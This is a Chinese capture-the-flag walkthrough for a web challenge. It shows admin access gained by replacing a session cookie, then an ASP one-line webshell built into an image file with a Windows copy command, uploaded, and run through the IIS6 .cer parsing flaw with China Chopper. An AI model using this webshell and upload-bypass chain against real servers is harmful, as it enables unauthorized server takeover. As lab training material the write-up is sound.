第五章- 进击!拿到Web最高权限
Tips:
通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情。
-
来到传送门提示修改cookie,这里我们想到了第四关的flag-cookie信息如下,修改cookie信息,成功进入后台。
cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
在存储里将上面的cookie值进行修改:
-
根据提示信息这里我们要进行上传文件木马,获得shell,经过尝试可以在以下位置上传文件(只要能上传就好),我是在图二位置上传的
上传了一个php小马,发现后台做了过略,而且是白名单,想着绕过,经过抓包修改文件等等发现不行无法绕过,只能上传图片木马。 -
制作图片木马(一个asp小马,和一张图片)
asp小马 <%eval request(“666”)%>
利用win自带命令将图片和木马合并
命令:copy xxx.asp/a + xxx.png/b xxx.png
查看和并后的文件木马写入成功:
-
上传木马,菜刀连接:
在上传文件那里查看自己上传的木马文件,点看复制文件地址,菜刀连接,发现无法连接,这里是因为无法解析,这里可以发现服务器是IIS6,百度发现iis6有解析漏洞,本题目主要是考iis6解析漏洞。iis6
可以将cer文件解析为asp,我们可以将刚才生成的666.png文件改名为.cer文件再次上传。
点开复制文件地址菜刀连接成功(这里需要注意菜刀连接时,脚本类型选择asp文件,):
5.寻找flag
zkz{G3t_the_admin!Sh3ll}